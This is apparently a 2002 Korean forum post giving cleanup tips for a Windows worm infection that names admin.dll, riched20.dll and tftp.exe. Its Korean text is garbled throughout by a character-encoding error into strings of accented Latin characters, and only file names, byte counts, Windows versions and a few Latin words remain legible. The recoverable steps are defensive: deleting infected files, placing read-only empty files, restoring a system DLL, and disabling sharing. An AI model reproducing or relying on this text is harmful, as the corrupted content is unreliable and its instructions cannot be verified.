°­Á¦·Î »èÁ¦Çϼŵµ Àá½ÃÈÄ ¶Ç »ý¼ºµË´Ï´Ù.. À̸§ ¹Ù²ãµµ ¶Ç »ý¼ºµË´Ï´Ù.. ³ª¸§´ë·ÎÀÇ ÇØ°áÃ¥Àº ¸Þ¸ðÀå ¿¬´ÙÀ½ ºó ÆÄÀÏ Çϳª »ý¼ºÇϼż­ admin.dll ÆÄÀÏ·Î ÀúÀåÇÏ´Â °Ì´Ï´Ù... ¹ÙÀÌ·¯½º °¨¿°ÆÄÀÏÀÌ Àбâ Àü¿ëÀ¸·Î µÇ¾îÀÖÀ¸´Ï ÆÄÀÏÀÇ µî·ÏÁ¤º¸¿¡¼­ ÀбâÀü¿ë ¼Ó¼ºÀ» ÇØÁ¦ÇÏ½Ã°í ºó ÆÄÀÏÀ» µ¤¾î¾²´Â°Ì´Ï´Ù... ¾²½Ã°í µî·ÏÁ¤º¸¿¡¼­ ÀбâÀü¿ëÀ¸·Î ÇϽñ¸¿ä... admin.dll ÆÄÀÏÀº c: d: e: µð·ºÅ丮¿¡ »ý¼ºµË´Ï´Ù... ÀÌ¹Ì ÆÄÀÏÀÌ Á¸ÀçÇÏ¸é »õ·Î »ý¼ºÇÏÁö´Â ¾Ê´õ±º¿ä...

3. Á¦°¡ °í»ýÇÑ ¶Ç ´Ù¸¥³»¿ëÀº riched20.dll ÆÄÀÏÀÌ ½Ã½ºÅÛ ÆÄÀϷμ­ »ý¼ºµÈ´Ù´Â °Ì´Ï´Ù.. ¹é½ÅÀ¸·Î Ä¡·áÇصµ ±×´ë·Î ³²¾ÆÀÖ°í.. Ž»ö±â °¡º¸¸é ¾Èº¸ÀÌ°í... Æú´õ¿É¼ÇÀÇ º¸È£µÈ ¿î¿µÆÄÀÏ ½Ã½ºÅÛ ¼û±â±â üũ ÇØÁ¦ÇÏ½Ã¸é º¸ÀÏ°Ì´Ï´Ù... ±×°Íµé ´Ù Áö¿ö¾ß Çϴµ¥ ¾î´À ÇÁ·Î¼¼¼­¸¦ Á×ÀÌ°í ÇؾßÇÏ´ÂÁö ¸ô¶ó¼­ ¾ÈÀü¸ðµå ºÎÆÃÇÑ´ÙÀ½¿¡ °­Á¦·Î ´Ù Áö¿ü½À´Ï´Ù... ±×¸®°í Áö¿ì½Ç¶§ ÆÄÀÏÅ©±â È®ÀÎÇϽðí Áö¿ì¼Å¾ß ÇÕ´Ï´Ù... 57344 byte ÀÔ´Ï´Ù.. À̰͸¸ Áö¿ì¼¼¿ä... ¸¹ÀÌ Áö¿ì¼Å¾ß ÇÒ°Ì´Ï´Ù..

[TIP] À©µµ¿ì 2000 ÀÌ·¸°Ô ÇÏ¸é ´Ô´Ù ÀâÀ» ¼ö ÀÖ´Ù?
1.À©µµ 2000 º¸¾ÈÆÐÄ¡¸¦ ²À¹Þ¾Æ ¼³Ä¡ Çϱ⠹ٶõ´Ù.. ²À
(Á¦ ¼Ò°ßÀ¸·Î´Â ÀúÈñ CIH ¹ÙÀÌ·¯½º ȨÆäÀÌÁö Àü¿ë ¹é½Å¿¡ µî·ÏµÇ¾î ÀÖ´Â Äڵ巹µå, ÄÚµåºí·ç ¿úÀ» ¼³Ä¡ Çϼ¼¿ä.^^)
2.Åë½Å¿¬°á ¾ÈµÇ°ÔÇÑ´Ù(Àü¿øÄÉÀ̺íÀ̳ª.·£ÄÉÀÌºí »Ì±â)
3.c:winntsystem32tftp.exe¸¦ °Á ¹«ÀðºñÇÏ°Ô Áö¿ìÀÚ!
4.¹ÙÀÌ·¯½º°Ë»ç¸¦ ÇÑ´Ù...... Âß~~~ µÇ°ÚÁ®ÇÏ°Å ¸®º×
5.Àç½ÇÇàÇÏ°í ÀÎÅͳݿ­°áÀ» ÇÑ´Ù Åë½Å¿¬°á

¢º ¹®Á¦Á¡ ÇØ°á
´Ô´Ù ¹ÙÀÌ·¯½º °¨¿°ÈÄ..¿öµå/¿¢¼¿ ½ÇÇàÀÌ ºÒ°¡´É½Ã

¸¸¾à ¿öµå,¿¢¼¿µî ÇÁ·Î±×·¥ ½ÇÇàÀÌ ºÒ°¡´ÉÇÒ °æ¿ì¿¡´Â "riched20.dll"ÆÄÀÏÀÌ ¹ÙÀÌ·¯½º·Î ÀÎÇÏ¿© ¼Õ»óµÇ¾úÀ¸¹Ç·Î Á¤»óÀûÀÎ ½Ã½ºÅÛ(¹ÙÀÌ·¯½º°¡ °¨¿°µÇÁö ¾ÊÀº °°Àº À©µµ¿ì¹öÀüÀÇ ½Ã½ºÅÛ)¿¡¼­ º¹»ç ÈÄ À©µµ ½Ã½ºÅÛÆú´õ (WindowsSystem ¶Ç´Â WINNTSystem32)¿¡ º¹»çÇØ ³ÖÀº¸é µË´Ï´Ù.

ÇÏÁö¸¸,À§¿¡ ÀÛ¾÷¿¡¼­´Â ÀÌ ¹ÙÀÌ·¯½º°¡ °¨¿°½ÃŲ ¿øº» ÆÄÀÏÀº º¹±¸ ÇÒ ¼ö ¾øÀ¸¹Ç·Î ¹é½Å¾÷ü¿¡¼­ Àü¿ë¹é½ÅµîÀÇ ÃֽŹöÀüÀÇ ¹é½ÅÀ¸·Î ¹Ýµå½Ã Ä¡·áÇϼ¼¿ä.

À©µµ¿ì 98 riched20.dll ´Ù¿î·Îµå Çϱâ

À©µµ¿ì ME riched20.dll ´Ù¿î·Îµå Çϱâ

À©µµ¿ì 2000 riched20.dll ´Ù¿î·Îµå Çϱâ

[TIP] TFTPxxxÄ¡·áÇÏ·Á¸é
1. ·ÎÄõð½ºÅ©(C:³ªD:)À» Ŭ¸¯ÇÑÈÄ ¿À¸¥Âʸ¶¿ì½º Ŭ¸¯
2. µî·ÏÁ¤º¸Å¬¸¯
3. À¥°øÀ¯ ÇØÁ¦ÇÏ°í
4. ³ª¿ÍÀÖ´Â ±âÁ¸ ´Ô´Ù¹é½ÅÀ¸·Î Ä¡·á
5. ÀçºÎÆÃ

°¥ÃÖ : ¾Èö¼ö ¿¬±¸¼Ò, ÇϿ츮, AVZONE, CERTCC-KR

starsnara ´Ô Á¦°ø °¢ ¹é½Å/º¸¾È ȸ»çµéÀÇ ´Ô´Ù ¹ÙÀÌ·¯½º Ä¡·á ¹æ¹ý.
¾Èö¼ö ¿¬±¸¼Ò Äڵ巹µå ½ÃÅ¥¾ÆÀÌ ¿¡ºê¸®Á¸ ½Ã¸¸ÅØ Æ®·»µåÄÚ¸®¾Æ ¼¼³Ø½º ÇϿ츮



2002-01-08 23:13:54
1119 ¹ø ÀÐÀ½
¢Ñ ·Î±×ÀÎ ÈÄ ÀÇ°ßÀ» ³²±â½Ç ¼ö ÀÖ½À´Ï´Ù
 Ä³½Ã¼±¹°





365ch.com 128bit Valid HTML 4.01 Transitional and Valid CSS!
ű×